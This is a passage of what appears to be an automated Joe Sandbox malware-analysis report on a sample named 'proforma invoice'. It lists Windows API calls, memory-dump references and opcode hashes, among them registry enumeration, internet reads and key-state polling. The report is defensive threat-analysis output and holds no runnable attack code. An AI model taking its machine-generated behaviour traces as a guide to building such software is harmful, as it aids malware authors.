                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: GetSystemWow64DirectoryW$X64
                  • API String ID: 145871493-2590602151
                  • Opcode ID: 80f2cf16ab37110ea8fae3983ef71a483148d84ced53a09634525a8506982667
                  • Instruction ID: 43869acb66e2e55797f1b97375e92dffb65f5e853d1181b1a4536a306daf7a4f
                  • Opcode Fuzzy Hash: 80f2cf16ab37110ea8fae3983ef71a483148d84ced53a09634525a8506982667
                  • Instruction Fuzzy Hash: 8BF02032406A289BE72217908C08ABD3A66AF11B01B648284F706FA115DB30CD40A7D2
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E9C
                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4EAE
                  • FreeLibrary.KERNEL32(00000000,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                  • API String ID: 145871493-3689287502
                  • Opcode ID: db1350036f5b492834b580897108c58df55a135f30b38e9a6a8bc25f890cdecd
                  • Instruction ID: 103af36b1c969c8a6f3faf26b1be44d2b13a9ad3847cf8fc8fbdba541fff14f3
                  • Opcode Fuzzy Hash: db1350036f5b492834b580897108c58df55a135f30b38e9a6a8bc25f890cdecd
                  • Instruction Fuzzy Hash: 87E0CD36A059225BD23217657C18B9F7994AFC7F63B150115FC05F3150DFE4CD0156E0
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E62
                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4E74
                  • FreeLibrary.KERNEL32(00000000,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E87
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                  • API String ID: 145871493-1355242751
                  • Opcode ID: ac0a71cc9e70931278bce62e381acb4ba0efd1e4cfe63ba1f83073b1bc1fc6c9
                  • Instruction ID: a055cf9d0303eeb6cce3254395e3e240e30b937ad9d92770c5e2a14bf63626ad
                  • Opcode Fuzzy Hash: ac0a71cc9e70931278bce62e381acb4ba0efd1e4cfe63ba1f83073b1bc1fc6c9
                  • Instruction Fuzzy Hash: 1CD0C236502A215746321B647C18EDF7E98AFCAF113150111F905F31A0CFA0CD0192D0
                  APIs
                  • GetCurrentProcessId.KERNEL32 ref: 00B2A427
                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B2A435
                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B2A468
                  • CloseHandle.KERNEL32(?), ref: 00B2A63D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$CloseCountersCurrentHandleOpen
                  • String ID:
                  • API String ID: 3488606520-0
                  • Opcode ID: a93e0a2c374a1983c943af571107a37adddae531d60c76042bdf8a0257a35bbb
                  • Instruction ID: 3e0af0f2be96942c91575899bc471b59fad0f4ed3a50b6a91ebcd505098ec123
                  • Opcode Fuzzy Hash: a93e0a2c374a1983c943af571107a37adddae531d60c76042bdf8a0257a35bbb
                  • Instruction Fuzzy Hash: FCA17F71604301AFE720DF24D986F2AB7E5AF84714F14885DF55A9B3D2DBB0EC418B92
                  APIs
                    • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B0CF22,?), ref: 00B0DDFD
                    • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B0CF22,?), ref: 00B0DE16
                    • Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A
                  • lstrcmpiW.KERNEL32(?,?), ref: 00B0E473
                  • MoveFileW.KERNEL32(?,?), ref: 00B0E4AC
                  • _wcslen.LIBCMT ref: 00B0E5EB
                  • _wcslen.LIBCMT ref: 00B0E603
                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B0E650
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                  • String ID:
                  • API String ID: 3183298772-0
                  • Opcode ID: bb253a4fc96cacb4c0f0cf0556e1a6daeebf040c3d74fa44a14006a098d9f05f
                  • Instruction ID: c911bcdcf880cc132739f93d2cbecf481410db6a19d91f2217ca4ccdd16b31c1
                  • Opcode Fuzzy Hash: bb253a4fc96cacb4c0f0cf0556e1a6daeebf040c3d74fa44a14006a098d9f05f
                  • Instruction Fuzzy Hash: 67518FB24083449BC724EBA4DC81ADFB7ECEF85340F00496EF59993191EF75E6888766
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2BAA5
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2BB00
                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B2BB63
                  • RegCloseKey.ADVAPI32(?,?), ref: 00B2BBA6
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B2BBB3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                  • String ID:
                  • API String ID: 826366716-0
                  • Opcode ID: 3cf25cb6667b478e4dee73232265d4a75ddaeee23e3be25ca14533905c732013
                  • Instruction ID: c7e114d2efdbe20e5973ad91a9e670bde9f0b22da481a263809e5190756ef8cc
                  • Opcode Fuzzy Hash: 3cf25cb6667b478e4dee73232265d4a75ddaeee23e3be25ca14533905c732013
                  • Instruction Fuzzy Hash: 5E61B031208241AFD714DF14D494E2ABBE5FF85348F1489ACF49A8B2A2DF31ED45CB92
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 00B08BCD
                  • VariantClear.OLEAUT32 ref: 00B08C3E
                  • VariantClear.OLEAUT32 ref: 00B08C9D
                  • VariantClear.OLEAUT32(?), ref: 00B08D10
                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B08D3B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$Clear$ChangeInitType
                  • String ID:
                  • API String ID: 4136290138-0
                  • Opcode ID: 69908abc108c5212fa916572fa4e31e4099b87d7e27c27dcc9aee91b183731cd
                  • Instruction ID: 7499b61f8dd7426a7b85e42c30e2c88f3b2880d60fd0bae0ac65b2b95656dcd2
                  • Opcode Fuzzy Hash: 69908abc108c5212fa916572fa4e31e4099b87d7e27c27dcc9aee91b183731cd
                  • Instruction Fuzzy Hash: DB517DB5A00219EFCB10CF58C894AAABBF5FF89310B158669F945DB350E730EA11CF90
                  APIs
                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B18BAE
                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B18BDA
                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B18C32
                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B18C57
                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B18C5F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: PrivateProfile$SectionWrite$String
                  • String ID:
                  • API String ID: 2832842796-0
                  • Opcode ID: 059729a6211d323db69e8660ff0bbbd741c70d434f18ab661b4824f8f967f17f
                  • Instruction ID: f9dfa906f05f1664f6bc1e1639c1c4c9a2ea795053712e376bf1e94492a661a8
                  • Opcode Fuzzy Hash: 059729a6211d323db69e8660ff0bbbd741c70d434f18ab661b4824f8f967f17f
                  • Instruction Fuzzy Hash: CA513035A00215DFCB05DF64C981AAEBBF5FF49314F088498E8496B3A2DB35ED51CB90
                  APIs
                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00B28F40
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00B28FD0
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B28FEC
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00B29032
                  • FreeLibrary.KERNEL32(00000000), ref: 00B29052
                    • Part of subcall function 00ABF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B11043,?,753CE610), ref: 00ABF6E6
                    • Part of subcall function 00ABF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00AFFA64,00000000,00000000,?,?,00B11043,?,753CE610,?,00AFFA64), ref: 00ABF70D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                  • String ID:
                  • API String ID: 666041331-0
                  • Opcode ID: e71d1dca02844267b58940b30320eb7e8bb8d7a00a3f07039bec89bd00efa007
                  • Instruction ID: 9ccb41d1a1876f7889c25f5be5005a27cf19f81264294818b1b10c843ea078f0
                  • Opcode Fuzzy Hash: e71d1dca02844267b58940b30320eb7e8bb8d7a00a3f07039bec89bd00efa007
                  • Instruction Fuzzy Hash: 24515C35A01215DFC711DF58D5948AEBBF1FF49314F0884A9E80AAB362DB31ED86CB90
                  APIs
                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00B36C33
                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00B36C4A
                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00B36C73
                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00B1AB79,00000000,00000000), ref: 00B36C98
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00B36CC7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Long$MessageSendShow
                  • String ID:
                  • API String ID: 3688381893-0
                  • Opcode ID: 91234cc0008848386cca3002039dc43bb952b57b3832f0968bf2e6072b8bef71
                  • Instruction ID: 5f47505625142504154640b57b74b5815ffeb507a9cf18e4519efc24fcfc9a07
                  • Opcode Fuzzy Hash: 91234cc0008848386cca3002039dc43bb952b57b3832f0968bf2e6072b8bef71
                  • Instruction Fuzzy Hash: AB41E635A04104BFDB24CF68CC95FA9BFE4EB09350F6592A8F899A72E0D771ED41CA50
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: e7eb7cee21afe6a5b153a8f44983ad240ff86d0b1ee0ebbba56a3b6e4ff1234d
                  • Instruction ID: 49c7f63668ff0a9b79fc3c472bd6293254cec7b52614e969864587b2a4d4ff96
                  • Opcode Fuzzy Hash: e7eb7cee21afe6a5b153a8f44983ad240ff86d0b1ee0ebbba56a3b6e4ff1234d
                  • Instruction Fuzzy Hash: C841B632A00200AFCB24DF78C981B6DB7B5EF99714F154569E516EB391DA31ED01DB80
                  APIs
                  • GetCursorPos.USER32(?), ref: 00AB9141
                  • ScreenToClient.USER32(00000000,?), ref: 00AB915E
                  • GetAsyncKeyState.USER32(00000001), ref: 00AB9183
                  • GetAsyncKeyState.USER32(00000002), ref: 00AB919D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AsyncState$ClientCursorScreen
                  • String ID:
                  • API String ID: 4210589936-0
                  • Opcode ID: 75ea90d57ef912d3375f15e8942624de2bd4c2561916256da24b674a4c0a88a0
                  • Instruction ID: bf075eb6c8dfd10ba95b2dfc7142a85dbfadb349be22ab327db1b703fbf6b8dc
                  • Opcode Fuzzy Hash: 75ea90d57ef912d3375f15e8942624de2bd4c2561916256da24b674a4c0a88a0
                  • Instruction Fuzzy Hash: CF414D7190850AAADB159FA8D844BFEBB74FF05320F208319F529A72A1CB345954DB51
                  APIs
                  • GetInputState.USER32 ref: 00B138CB
                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B13922
                  • TranslateMessage.USER32(?), ref: 00B1394B
                  • DispatchMessageW.USER32(?), ref: 00B13955
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B13966
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                  • String ID:
                  • API String ID: 2256411358-0
                  • Opcode ID: 0ba67dfead616cc1ba57ad6c3c10766081e46ab41bfc1063908a74cdeb08f994
                  • Instruction ID: a4e830e2d66bb921c0c3c9e743f437661dd5aa28255e1270a2b4c696b1523622
                  • Opcode Fuzzy Hash: 0ba67dfead616cc1ba57ad6c3c10766081e46ab41bfc1063908a74cdeb08f994
                  • Instruction Fuzzy Hash: 7C31C6705043419EEB35CB789849BF63BE8EB15740F9405E9E467D30A0FBB4AAC5CB21
                  APIs
                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00B1CF38
                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00B1CF6F
                  • GetLastError.KERNEL32(?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFB4
                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFC8
                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFF2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                  • String ID:
                  • API String ID: 3191363074-0
                  • Opcode ID: 804e617178e6e086c23978890a61422a2b2d48a9ee2b7e40d302acedaa5c2142
                  • Instruction ID: 3a0266afb8d6b4a475814b10db4024c238a539b77040dc654d43021df03cb63b
                  • Opcode Fuzzy Hash: 804e617178e6e086c23978890a61422a2b2d48a9ee2b7e40d302acedaa5c2142
                  • Instruction Fuzzy Hash: 1B313A71540205AFDB20DFA5C984AABBFF9EB14354B6044AEF516E3141DB30EE8A9B60
                  APIs
                  • GetWindowRect.USER32(?,?), ref: 00B01915
                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 00B019C1
                  • Sleep.KERNEL32(00000000,?,?,?), ref: 00B019C9
                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 00B019DA
                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B019E2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessagePostSleep$RectWindow
                  • String ID:
                  • API String ID: 3382505437-0
                  • Opcode ID: 847de4d0c25f22cd1b65ecb871533157b62ed02526744cecf1a8f9bf6b32201a
                  • Instruction ID: 1fe31bbc1d37416820057684b7057e08fa8c3857661e5e71080e06d76c3129c3
                  • Opcode Fuzzy Hash: 847de4d0c25f22cd1b65ecb871533157b62ed02526744cecf1a8f9bf6b32201a
                  • Instruction Fuzzy Hash: 2231C071A00219EFCB04CFACCD99ADE3FB5EB45315F108669FA21A72D1C7709945DB90
                  APIs
                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B35745
                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B3579D
                  • _wcslen.LIBCMT ref: 00B357AF
                  • _wcslen.LIBCMT ref: 00B357BA
                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B35816
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$_wcslen
                  • String ID:
                  • API String ID: 763830540-0
                  • Opcode ID: 4710f3a895467bb966cf1ddeb9389c26deb780db20c2c186fd2ee5ed3ef70ae9
                  • Instruction ID: 66875b469e4780e3f7782e4d46ac7cd28a65b5b9b632d92b3cc860349ffdd4eb
                  • Opcode Fuzzy Hash: 4710f3a895467bb966cf1ddeb9389c26deb780db20c2c186fd2ee5ed3ef70ae9
                  • Instruction Fuzzy Hash: 55216575904618DADB309FA4DC85AED7BF8FF04724F208296E929EB2C4D7709985CF50
                  APIs
                  • IsWindow.USER32(00000000), ref: 00B20951
                  • GetForegroundWindow.USER32 ref: 00B20968
                  • GetDC.USER32(00000000), ref: 00B209A4
                  • GetPixel.GDI32(00000000,?,00000003), ref: 00B209B0
                  • ReleaseDC.USER32(00000000,00000003), ref: 00B209E8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ForegroundPixelRelease
                  • String ID:
                  • API String ID: 4156661090-0
                  • Opcode ID: 5b7ffe03b2465619dbfa738b03c369bab33f021ac9da27bb25ca67a49ea7e7d8
                  • Instruction ID: fbefa2ab662b00351e0263bc8ff62bfbd95d5dc4f83b5c1dbd2a4ca8c5ed6c4a
                  • Opcode Fuzzy Hash: 5b7ffe03b2465619dbfa738b03c369bab33f021ac9da27bb25ca67a49ea7e7d8
                  • Instruction Fuzzy Hash: 0B219635600214AFD704EFA9D985A9EBBF5EF49700F148468F84AE7762CB30EC44CB50
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 00ADCDC6
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ADCDE9
